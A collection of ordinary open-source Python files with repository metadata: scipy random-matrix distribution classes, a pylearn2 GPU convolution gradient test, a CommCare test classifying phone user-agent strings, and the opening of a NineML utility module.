C, lower = scipy.linalg.cho_factor(self.scale, lower=True)
self.log_det_scale = 2 * np.sum(np.log(C.diagonal()))
# Get the inverse using the Cholesky factorization
eye = np.eye(self.dim)
self.inv_scale = scipy.linalg.cho_solve((C, lower), eye)
# Get the Cholesky factorization of the inverse scale
self.C = scipy.linalg.cholesky(self.inv_scale, lower=True)
def logpdf(self, x):
x = self._dist._process_quantiles(x, self.dim)
out = self._dist._logpdf(x, self.dim, self.df, self.scale,
self.log_det_scale)
return _squeeze_output(out)
def pdf(self, x):
return np.exp(self.logpdf(x))
def mean(self):
out = self._dist._mean(self.dim, self.df, self.scale)
return _squeeze_output(out) if out is not None else out
def mode(self):
out = self._dist._mode(self.dim, self.df, self.scale)
return _squeeze_output(out)
def var(self):
out = self._dist._var(self.dim, self.df, self.scale)
return _squeeze_output(out) if out is not None else out
def rvs(self, size=1, random_state=None):
n, shape = self._dist._process_size(size)
out = self._dist._rvs(n, shape, self.dim, self.df,
self.C, random_state)
return _squeeze_output(out)
def entropy(self):
# Need to find reference for inverse Wishart entropy
raise AttributeError
# Set frozen generator docstrings from corresponding docstrings in
# inverse Wishart and fill in default strings in class docstrings
for name in ['logpdf', 'pdf', 'mean', 'mode', 'var', 'rvs']:
method = invwishart_gen.__dict__[name]
method_frozen = wishart_frozen.__dict__[name]
method_frozen.__doc__ = doccer.docformat(
method.__doc__, wishart_docdict_noparams)
method.__doc__ = doccer.docformat(method.__doc__, wishart_docdict_params)
class special_ortho_group_gen(multi_rv_generic):
r"""
A matrix-valued SO(N) random variable.
Return a random rotation matrix, drawn from the Haar distribution
(the only uniform distribution on SO(n)).
The `dim` keyword specifies the dimension N.
Methods
-------
``rvs(dim=None, size=1, random_state=None)``
Draw random samples from SO(N).
Parameters
----------
dim : scalar
Dimension of matrices
Notes
----------
This class is wrapping the random_rot code from the MDP Toolkit,
https://github.com/mdp-toolkit/mdp-toolkit
Return a random rotation matrix, drawn from the Haar distribution
(the only uniform distribution on SO(n)).
The algorithm is described in the paper
Stewart, G.W., "The efficient generation of random orthogonal
matrices with an application to condition estimators", SIAM Journal
on Numerical Analysis, 17(3), pp. 403-409, 1980.
For more information see
http://en.wikipedia.org/wiki/Orthogonal_matrix#Randomization
See also the similar `ortho_group`.
Examples
--------
>>> from scipy.stats import special_ortho_group
>>> x = special_ortho_group.rvs(3)
>>> np.dot(x, x.T)
array([[ 1.00000000e+00, 1.13231364e-17, -2.86852790e-16],
[ 1.13231364e-17, 1.00000000e+00, -1.46845020e-16],
[ -2.86852790e-16, -1.46845020e-16, 1.00000000e+00]])
>>> import scipy.linalg
>>> scipy.linalg.det(x)
1.0
This generates one random matrix from SO(3). It is orthogonal and
has a determinant of 1.
"""
def __init__(self, seed=None):
super(special_ortho_group_gen, self).__init__(seed)
self.__doc__ = doccer.docformat(self.__doc__)
def __call__(self, dim=None, seed=None):
"""
Create a frozen SO(N) distribution.
See `special_ortho_group_frozen` for more information.
"""
return special_ortho_group_frozen(dim, seed=seed)
def _process_parameters(self, dim):
"""
Dimension N must be specified; it cannot be inferred.
"""
if dim is None or not np.isscalar(dim) or dim <= 1 or dim != int(dim):
raise ValueError("""Dimension of rotation must be specified,
and must be a scalar greater than 1.""")
return dim
def rvs(self, dim, size=1, random_state=None):
"""
Draw random samples from SO(N).
Parameters
----------
dim : integer
Dimension of rotation space (N).
size : integer, optional
Number of samples to draw (default 1).
Returns
-------
rvs : ndarray or scalar
Random size N-dimensional matrices, dimension (size, dim, dim)
"""
size = int(size)
if size > 1:
return np.array([self.rvs(dim, size=1, random_state=random_state)
for i in range(size)])
dim = self._process_parameters(dim)
random_state = self._get_random_state(random_state)
H = np.eye(dim)
D = np.ones((dim,))
for n in range(1, dim):
x = random_state.normal(size=(dim-n+1,))
D[n-1] = np.sign(x[0])
x[0] -= D[n-1]*np.sqrt((x*x).sum())
# Householder transformation
Hx = (np.eye(dim-n+1)
- 2.*np.outer(x, x)/(x*x).sum())
mat = np.eye(dim)
mat[n-1:, n-1:] = Hx
H = np.dot(H, mat)
# Fix the last sign such that the determinant is 1
D[-1] = (-1)**(1-(dim % 2))*D.prod()
# Equivalent to np.dot(np.diag(D), H) but faster, apparently
H = (D*H.T).T
return H
special_ortho_group = special_ortho_group_gen()
class special_ortho_group_frozen(multi_rv_frozen):
def __init__(self, dim=None, seed=None):
"""
Create a frozen SO(N) distribution.
Parameters
----------
dim : scalar
Dimension of matrices
seed : None or int or np.random.RandomState instance, optional
This parameter defines the RandomState object to use for drawing
random variates.
If None (or np.random), the global np.random state is used.
If integer, it is used to seed the local RandomState instance
Default is None.
Examples
--------
>>> from scipy.stats import special_ortho_group
>>> g = special_ortho_group(5)
>>> x = g.rvs()
"""
self._dist = special_ortho_group_gen(seed)
self.dim = self._dist._process_parameters(dim)
def rvs(self, size=1, random_state=None):
return self._dist.rvs(self.dim, size, random_state)
class ortho_group_gen(multi_rv_generic):
r"""
A matrix-valued O(N) random variable.
Return a random orthogonal matrix, drawn from the O(N) Haar
distribution (the only uniform distribution on O(N)).
The `dim` keyword specifies the dimension N.
Methods
-------
``rvs(dim=None, size=1, random_state=None)``
Draw random samples from O(N).
Parameters
----------
dim : scalar
Dimension of matrices
Notes
----------
This class is closely related to `special_ortho_group`.
Some care is taken to avoid numerical error, as per the paper by Mezzadri.
References
----------
.. [1] F. Mezzadri, "How to generate random matrices from the classical
compact groups", arXiv:math-ph/0609050v2.
Examples
--------
>>> from scipy.stats import ortho_group
>>> x = ortho_group.rvs(3)
>>> np.dot(x, x.T)
array([[ 1.00000000e+00, 1.13231364e-17, -2.86852790e-16],
[ 1.13231364e-17, 1.00000000e+00, -1.46845020e-16],
[ -2.86852790e-16, -1.46845020e-16, 1.00000000e+00]])
>>> import scipy.linalg
>>> np.fabs(scipy.linalg.det(x))
1.0
This generates one random matrix from O(3). It is orthogonal and
has a determinant of +1 or -1.
"""
def __init__(self, seed=None):
super(ortho_group_gen, self).__init__(seed)
self.__doc__ = doccer.docformat(self.__doc__)
def _process_parameters(self, dim):
"""
Dimension N must be specified; it cannot be inferred.
"""
if dim is None or not np.isscalar(dim) or dim <= 1 or dim != int(dim):
raise ValueError("Dimension of rotation must be specified,"
"and must be a scalar greater than 1.")
return dim
def rvs(self, dim, size=1, random_state=None):
"""
Draw random samples from O(N).
Parameters
----------
dim : integer
Dimension of rotation space (N).
size : integer, optional
Number of samples to draw (default 1).
Returns
-------
rvs : ndarray or scalar
Random size N-dimensional matrices, dimension (size, dim, dim)
"""
size = int(size)
if size > 1:
return np.array([self.rvs(dim, size=1, random_state=random_state)
for i in range(size)])
dim = self._process_parameters(dim)
random_state = self._get_random_state(random_state)
H = np.eye(dim)
for n in range(1, dim):
x = random_state.normal(size=(dim-n+1,))
# random sign, 50/50, but chosen carefully to avoid roundoff error
D = np.sign(x[0])
x[0] += D*np.sqrt((x*x).sum())
# Householder transformation
Hx = -D*(np.eye(dim-n+1)
- 2.*np.outer(x, x)/(x*x).sum())
mat = np.eye(dim)
mat[n-1:, n-1:] = Hx
H = np.dot(H, mat)
return H
ortho_group = ortho_group_gen()
|
larsmans/scipy
|
scipy/stats/_multivariate.py
|
Python
|
bsd-3-clause
| 92,794
|
__authors__ = "Ian Goodfellow"
__copyright__ = "Copyright 2010-2012, Universite de Montreal"
__credits__ = ["Ian Goodfellow"]
__license__ = "3-clause BSD"
__maintainer__ = "LISA Lab"
__email__ = "pylearn-dev@googlegroups"
from pylearn2.testing.skip import skip_if_no_gpu
skip_if_no_gpu()
import numpy as np
from theano import shared
from pylearn2.sandbox.cuda_convnet.filter_acts import FilterActs
from pylearn2.sandbox.cuda_convnet.weight_acts import WeightActs
from theano.sandbox.cuda import gpu_from_host
from theano.sandbox.cuda import host_from_gpu
from theano.sandbox.rng_mrg import MRG_RandomStreams
import theano.tensor as T
from theano.tensor.nnet.conv import conv2d
from theano.tensor import as_tensor_variable
from theano import function
import warnings
def test_match_grad_valid_conv():
# Tests that weightActs is the gradient of FilterActs
# with respect to the weights.
for partial_sum in [0, 1, 4]:
rng = np.random.RandomState([2012,10,9])
batch_size = 3
rows = 7
cols = 9
channels = 8
filter_rows = 4
filter_cols = filter_rows
num_filters = 16
images = shared(rng.uniform(-1., 1., (channels, rows, cols,
batch_size)).astype('float32'), name='images')
filters = shared(rng.uniform(-1., 1., (channels, filter_rows,
filter_cols, num_filters)).astype('float32'), name='filters')
gpu_images = gpu_from_host(images)
gpu_filters = gpu_from_host(filters)
output = FilterActs(partial_sum=partial_sum)(gpu_images, gpu_filters)
output = host_from_gpu(output)
images_bc01 = images.dimshuffle(3,0,1,2)
filters_bc01 = filters.dimshuffle(3,0,1,2)
filters_bc01 = filters_bc01[:,:,::-1,::-1]
output_conv2d = conv2d(images_bc01, filters_bc01,
border_mode='valid')
output_conv2d = output_conv2d.dimshuffle(1,2,3,0)
theano_rng = MRG_RandomStreams(2013 + 1 + 31)
coeffs = theano_rng.normal(avg=0., std=1., size=output_conv2d.shape, dtype='float32')
cost_conv2d = (coeffs * output_conv2d).sum()
weights_grad_conv2d = T.grad(cost_conv2d, filters)
cost = (coeffs * output).sum()
hid_acts_grad = T.grad(cost, output)
weights_grad = WeightActs(partial_sum=partial_sum)(
gpu_images,
gpu_from_host(hid_acts_grad),
as_tensor_variable((4, 4))
)[0]
weights_grad = host_from_gpu(weights_grad)
f = function([], [output, output_conv2d, weights_grad, weights_grad_conv2d])
output, output_conv2d, weights_grad, weights_grad_conv2d = f()
if np.abs(output - output_conv2d).max() > 8e-6:
assert type(output) == type(output_conv2d)
assert output.dtype == output_conv2d.dtype
if output.shape != output_conv2d.shape:
print 'cuda-convnet shape: ',output.shape
print 'theano shape: ',output_conv2d.shape
assert False
err = np.abs(output - output_conv2d)
print 'absolute error range: ', (err.min(), err.max())
print 'mean absolute error: ', err.mean()
print 'cuda-convnet value range: ', (output.min(), output.max())
print 'theano value range: ', (output_conv2d.min(), output_conv2d.max())
assert False
warnings.warn("""test_match_grad_valid_conv success criterion is not very strict. Can we verify that this is OK?
One possibility is that theano is numerically unstable and Alex's code is better.
Probably theano CPU 64 bit is OK but it's worth checking the others.""")
if np.abs(weights_grad - weights_grad_conv2d).max() > 8.6e-6:
if type(weights_grad) != type(weights_grad_conv2d):
raise AssertionError("weights_grad is of type " + str(weights_grad))
assert weights_grad.dtype == weights_grad_conv2d.dtype
if weights_grad.shape != weights_grad_conv2d.shape:
print 'cuda-convnet shape: ',weights_grad.shape
print 'theano shape: ',weights_grad_conv2d.shape
assert False
err = np.abs(weights_grad - weights_grad_conv2d)
print 'absolute error range: ', (err.min(), err.max())
print 'mean absolute error: ', err.mean()
print 'cuda-convnet value range: ', (weights_grad.min(), weights_grad.max())
print 'theano value range: ', (weights_grad_conv2d.min(), weights_grad_conv2d.max())
assert False
if __name__ == '__main__':
test_match_grad_valid_conv()
|
ml-lab/pylearn2
|
pylearn2/sandbox/cuda_convnet/tests/test_weight_acts.py
|
Python
|
bsd-3-clause
| 4,679
|
from django.test import SimpleTestCase
from corehq.apps.receiverwrapper.util import J2ME, guess_phone_type_from_user_agent, ANDROID
class TestPhoneType(SimpleTestCase):
def testJavaUserAgents(self):
corpus = [
# observed from c2 submission
'NokiaC2-01/5.0 (11.10) Profile/MIDP-2.1 Configuration/CLDC-1.1 Profile/MIDP-2.0 Configuration/CLDC-1.1',
# http://developer.nokia.com/community/wiki/User-Agent_headers_for_Nokia_devices
'Mozilla/5.0 (Series40; Nokia311/03.81; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.2.0.0.31',
'Mozilla/5.0 (Series40; NokiaX3-02/le6.32; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/2.0.2.62.10',
'Mozilla/5.0 (SymbianOS/9.1; U; [en-us]) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/5.0 (SymbianOS/9.1; U; [en]; SymbianOS/91 Series60/3.0) AppleWebkit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es61',
'Mozilla/5.0 (SymbianOS/9.1; U; [en]; Series60/3.0 NokiaE60/4.06.0) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'NokiaN73-2/3.0-630.0.2 Series60/3.0 Profile/MIDP-2.0 Configuration/CLDC-1.1',
'NokiaN73-2/2.0626 S60/3.0 Profile/MIDP-2.0 Configuration/CLDC-1.1',
'Mozilla/4.0 (compatible; MSIE 5.0; S60/3.0 NokiaN73-1/2.0(2.0617.0.0.7) Profile/MIDP-2.0 Configuration/CLDC-1.1)',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaXxx/1.0; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/5.0 (SymbianOS/9.3; U; Series60/3.2 NokiaE75-1/110.48.125 Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 Nokia5800d-1/21.0.025; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/12.0.024; Profile/MIDP-2.1 Configuration/CLDC-1.1; en-us) AppleWebKit/525 (KHTML, like Gecko) BrowserNG/7.1.12344',
'NokiaN90-1/3.0545.5.1 Series60/2.8 Profile/MIDP-2.0 Configuration/CLDC-1.1',
'Nokia3200/1.0 (5.29) Profile/MIDP-1.0 Configuration/CLDC-1.0 UP.Link/6.3.1.13.0',
'NokiaN80-3/1.0552.0.7Series60/3.0Profile/MIDP-2.0Configuration/CLDC-1.1',
'Nokia7610/2.0 (5.0509.0) SymbianOS/7.0s Series60/2.1 Profile/MIDP-2.0 Configuration/CLDC-1.0',
'Nokia6600/1.0 (5.27.0) SymbianOS/7.0s Series60/2.0 Profile/MIDP-2.0 Configuration/CLDC-1',
'Nokia6680/1.0 (4.04.07) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1',
'Nokia6230/2.0+(04.43)+Profile/MIDP-2.0+Configuration/CLDC-1.1+UP.Link/6.3.0.0.0',
'Nokia6630/1.0 (2.3.129) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1',
'Nokia7600/2.0 (03.01) Profile/MIDP-1.0 Configuration/CLDC-1.0 (Google WAP Proxy/1.0)',
'NokiaN-Gage/1.0 SymbianOS/6.1 Series60/1.2 Profile/MIDP-1.0 Configuration/CLDC-1.0',
'Nokia5140/2.0 (3.10) Profile/MIDP-2.0 Configuration/CLDC-1.1',
'Nokia3510i/1.0 (04.44) Profile/MIDP-1.0 Configuration/CLDC-1.0',
'Nokia7250i/1.0 (3.22) Profile/MIDP-1.0 Configuration/CLDC-1.0',
'Nokia7250/1.0 (3.14) Profile/MIDP-1.0 Configuration/CLDC-1.0',
'Nokia6800/2.0 (4.17) Profile/MIDP-1.0 Configuration/CLDC-1.0 UP.Link/5.1.2.9',
'Nokia3650/1.0 SymbianOS/6.1 Series60/1.2 Profile/MIDP-1.0 Configuration/CLDC-1.0',
'Nokia8310/1.0 (05.11) UP.Link/6.5.0.0.06.5.0.0.06.5.0.0.06.5.0.0.0',
'Mozilla/5.0 (X11; U; Linux armv7l; en-GB; rv:1.9.2b6pre) Gecko/20100318 Firefox/3.5 Maemo Browser 1.7.4.7 RX-51 N900',
# http://www.zytrax.com/tech/web/mobile_ids.html
'Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0; NOKIA; Lumia 710)',
'Nokia2700c-2/2.0 (09.80) Profile/MIDP-2.1 Configuration/CLDC-1.1 UCWEB/2.0(Java; U; MIDP-2.0; en-US; nokia2700c-2) U2/1.0.0 UCBrowser/8.8.1.252 U2/1.0.0 Mobile',
'Nokia2760/2.0 (06.82) Profile/MIDP-2.1 Configuration/CLDC-1.1',
'Nokia2700c-2/2.0 (07.80) Profile/MIDP-2.1 Configuration/CLDC-1.1 nokia2700c-2/UC Browser7.7.1.88/69/444 UNTRUSTED/1.0',
'Opera/9.80 (J2ME/MIDP; Opera Mini/4.1.15082/22.414; U; en) Presto/2.5.25 Version/10.54',
'Nokia3120Classic/2.0 (06.20) Profile/MIDP-2.1 Configuration/CLDC-1.1',
'Opera/8.0.1 (J2ME/MIDP; Opera Mini/3.1.9427/1724; en; U; ssr)',
'Nokia3200/1.0 (5.29) Profile/MIDP-1.0 Configuration/CLDC-1.0 UP.Link/6.3.1.13.0',
'Nokia3510i/1.0 (04.44) Profile/MIDP-1.0 Configuration/CLDC-1.0',
'Nokia3650/1.0 SymbianOS/6.1 Series60/1.2 Profile/MIDP-1.0 Configuration/CLDC-1.0',
'Mozilla/4.0 (compatible; MSIE 4.0; SmartPhone; Symbian OS/1.1.0) Netfront/3.1',
'Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 Nokia5800d-1/60.0.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.33 Mobile Safari/533.4 3gpp-gba',
'Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 Nokia5230/40.0.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.7.4 3gpp-gba',
'Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 Nokia5800d-1/50.0.005; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.2.3',
'Nokia5130c-2/2.0 (07.97) Profile/MIDP-2.1 Configuration/CLDC-1.1 nokia5130c-2/UC Browser7.5.1.77/69/351 UNTRUSTED/1.0',
'Nokia5140/2.0 (3.10) Profile/MIDP-2.0 Configuration/CLDC-1.1',
'Mozilla/5.0 (SymbianOS/9.4; U; Series60/5.0 Nokia5800d-1b/20.2.014; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Nokia6212 classic/2.0 (06.20) Profile/MIDP-2.1 Configuration/CLDC-1.1',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 Nokia6120c/3.83; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; Nokia 6680/5.04.07; 9399) Opera 8.65 [en]',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es61i',
'Nokia6230/2.0+(04.43)+Profile/MIDP-2.0+Configuration/CLDC-1.1+UP.Link/6.3.0.0.0',
'Nokia6630/1.0 (2.3.129) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1',
'Mozilla/4.1 (compatible; MSIE 5.0; Symbian OS; Nokia 6600;432) Opera 6.10 [en]',
'Nokia6600/1.0 (5.27.0) SymbianOS/7.0s Series60/2.0 Profile/MIDP-2.0 Configuration/CLDC-1',
'Nokia6680/1.0 (4.04.07) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1',
'Mozilla/4.1 (compatible; MSIE 5.0; Symbian OS; Nokia 6600;452) Opera 6.20 [en-US]',
'Nokia6800/2.0 (4.17) Profile/MIDP-1.0 Configuration/CLDC-1.0 UP.Link/5.1.2.9',
'Nokia7610/2.0 (7.0642.0) SymbianOS/7.0s Series60/2.1 Profile/MIDP-2.0 Configuration/CLDC-1.0/UC Browser7.9.1.120/27/351/UCWEB',
'Nokia7250I/1.0 (3.22) Profile/MIDP-1.0 Configuration/CLDC-1.0',
'Nokia7250/1.0 (3.14) Profile/MIDP-1.0 Configuration/CLDC-1.0',
'Nokia7610/2.0 (5.0509.0) SymbianOS/7.0s Series60/2.1 Profile/MIDP-2.0 Configuration/CLDC-1.0',
'Nokia8310/1.0 (05.11) UP.Link/6.5.0.0.06.5.0.0.06.5.0.0.06.5.0.0.0',
'Mozilla/4.0 (compatible; MSIE 5.0; Series80/2.0 Nokia9300/05.22 Profile/MIDP-2.0 Configuration/CLDC-1.1)',
'Mozilla/4.0 (compatible; MSIE 5.0; Series80/2.0 Nokia9500/4.51 Profile/MIDP-2.0 Configuration/CLDC-1.1)',
'NokiaC3-00/5.0 (04.60) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+',
'Mozilla/5.0 (SymbianOS/9.3; Series60/3.2 NokiaE55-1/034.001; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) Version/3.0 BrowserNG/7.1.5',
'Opera/9.80 (S60; SymbOS; Opera Mobi/499; U; en-GB) Presto/2.4.18 Version/10.00',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413 es61i',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.13918/488; U; en) Presto/2.2.0',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE63-3/100.21.110; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/07.24.0.3; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413 UP.Link/6.2.3.18.0',
'Mozilla/5.0 (MeeGo; NokiaN9) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13',
'NokiaN70-1/5.0737.3.0.1 Series60/2.8 Profile/MIDP-2.0 Configuration/CLDC-1.1/UC Browser7.8.0.95/27/352',
'Mozilla/5.0 (SymbianOS/9.3; U; Series60/3.2 NokiaN79-1/32.001; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/5.0 (SymbianOS/9.4; Series60/5.0 NokiaN97-1/20.0.019; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/525 (KHTML, like Gecko) BrowserNG/7.1.18124',
'Mozilla/5.0 (SymbianOS/9.3; U; Series60/3.2 NokiaN85-1/31.002; Profile/MIDP-2.1 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
# 'Mozilla/5.0 (X11; U; Linux armv61; en-US; rv:1.9.1b2pre) Gecko/20081015 Fennec/1.0a1', # Alpha version of Mozilla Fennec (mobile Firefox) on Nokia N800.
'Mozilla/5.0 (X11; U; Linux armv7l; en-GB; rv:1.9.2a1pre) Gecko/20090928 Firefox/3.5 Maemo Browser 1.4.1.22 RX-51 N900',
# 'Mozilla/5.0 (X11; U; Linux armv6l; en-us) AppleWebKit/528.5+ (KHTML, like Gecko, Safari/528.5+) tear', # Tear 0.3 (Beta) on Nokia N800 under Mer
# 'Mozilla/5.0 (X11; U; Linux armv6l; en-us) AppleWebKit/528.5+ (KHTML, like Gecko, Safari/528.5+) midori', # Midori on Nokia n800 tablet device.
# 'Links (2.1pre31; Linux 2.6.21-omap1 armv6l; x)', # Links 2.1 preview 31 on a Nokia N800 tablet under OS2008
# 'Mozilla/5.0 (X11; U; Linux armv6l; en-US; rv: 1.9.1a2pre) Gecko/20080813221937 Prism/0.9.1', # Prism on a Nokia N800 tablet under OS2008
# 'Mozilla/5.0 (X11; U; Linux armv6l; en-US; rv:1.9a6pre) Gecko/20070810 Firefox/3.0a1 Tablet browser 0.1.16 RX-34_2007SE_4.2007.38-2', # Nokia N800 (Internet tablet) (v.20.0.015) running MicroB (a version of FF3) with embedded Flash 9 player
# 'Opera/9.50 (J2ME/MIDP; Opera Mini/4.1.10781/298; U; en)', # Nokia N95 (v.20.0.015) running Opera 9.50 MINI
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE71-1/100.07.76; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Opera/8.01 (J2ME/MIDP; Opera Mini/3.0.6306/1528; en; U; ssr)',
'Mozilla/4.0 (compatible; MSIE 6.0; ; Linux armv5tejl; U) Opera 8.02 [en_US] Maemo browser 0.4.31 N770/SU-18',
'NokiaN80-3/1.0552.0.7Series60/3.0Profile/MIDP-2.0Configuration/CLDC-1.1',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
# 'Mozilla/5.0 (X11; U; Linux armv6l; en-US; rv:1.9a6pre) Gecko/20070807 Firefox/3.0a1 Tablet browser 0.1.16 RX-34_2007SE_4.2007.26-8', # Firefox on Nokia N800 Tablet PC
'NokiaN90-1/3.0545.5.1 Series60/2.8 Profile/MIDP-2.0 Configuration/CLDC-1.1',
'NokiaN-Gage/1.0 SymbianOS/6.1 Series60/1.2 Profile/MIDP-1.0 Configuration/CLDC-1.0',
]
for java_agent in corpus:
self.assertEqual(J2ME, guess_phone_type_from_user_agent(java_agent), 'j2me user agent detection failed for {}'.format(java_agent))
def testAnroidUserAgents(self):
corpus = [
# http://www.zytrax.com/tech/web/mobile_ids.html
# android like things
'Mozilla/5.0 (Linux; Android 4.1.1; Transformer Prime TF201 Build/JRO03C) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.166 Safari/535.19',
'Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; Transformer TF101 Build/IMM76I) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30',
'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; VS840 4G Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
'Mozilla/5.0 (Linux; U; Android 2.2.1; en-us; MB525 Build/3.4.2-107_JDN-9) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
'Mozilla/5.0 (Linux; U; Android 2.1-update1-1.0.19; en-us; NXM736 Build/ECLAIR) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17',
'Mozilla/5.0 (Linux; U; Android 2.2; de-de; U0101HA Build/FRF85B) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
'Mozilla/5.0 (Linux; U; Android 2.2.1; de-de; SP-60 Build/MASTER) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
'Mozilla/5.0 (Linux; U; Android 2.2; en-gb; ViewPad7 Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
'Mozilla/5.0 (Linux; U; Android 2.1-2010.11.4; de-de; XST2 Build/ECLAIR) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17',
'Mozilla/5.0 (Linux; U; Android 1.0.3; de-de; A80KSC Build/ECLAIR) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17',
'Mozilla/5.0 (Linux; U; Android 2.2.1; en-au; eeepc Build/MASTER) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
'Mozilla/5.0 (Linux; U; Android 1.6; en-us; xpndr_ihome Build/DRD35) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1',
'Mozilla/5.0 (Linux; U; Android 2.2.1; fr-ch; A43 Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
'Mozilla/5.0 (Linux; U; Android 2.2.1; de-de; X2 Build/FRG83) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
]
for android_agent in corpus:
self.assertEqual(ANDROID, guess_phone_type_from_user_agent(android_agent), 'android user agent detection failed for {}'.format(android_agent))
def testDefaultIsAndroid(self):
for empty in [None, '']:
self.assertEqual(ANDROID, guess_phone_type_from_user_agent(empty))
|
puttarajubr/commcare-hq
|
corehq/apps/receiverwrapper/tests/test_guess_phone_type.py
|
Python
|
bsd-3-clause
| 14,799
|
from __future__ import absolute_import
from builtins import zip
from past.builtins import basestring
import itertools
from functools import reduce
import collections
from operator import attrgetter
from .validation import assert_no_duplicates
from ..exceptions import NineMLUsageError
from nineml.base import ContainerObject
from logging import getLogger
logger = getLogger('NineML')
class OrderedDefaultListDict(collections.OrderedDict):
def __missing__(self, key):
self[key] = value = []
return value
def expect_single(lst, errmsg=None):
"""Retrieve a single element from an iterable.
This function tests whether an iterable contains just a single element and
if so returns that element. Otherwise it raises an Exception.
:param lst: An iterable
:rtype: the element in the list, ``lst[0]``, provided ``len(lst)==1``
>>> expect_single( ['hello'] )
'hello'
>>> expect_single( [1] )
1
>>> expect_single( [] ) #doctest: +SKIP
NineMLUsageError: expect_single() recieved an iterable of length: 0
>>> expect_single( [None,None] ) #doctest: +SKIP
NineMLUsageError: expect_single() recieved an iterable of length: 2
>>> expect_single( [], lambda: raise_exception( RuntimeError('Aggh') ) #doctest: +SKIP # @IgnorePep8
RuntimeError: Aggh
>>> #Slightly more tersly:
>>> expect_single( [], RuntimeError('Aggh') ) #doctest: +SKIP
RuntimeError: Aggh
"""
if isinstance(lst, basestring):
raise NineMLUsageError(
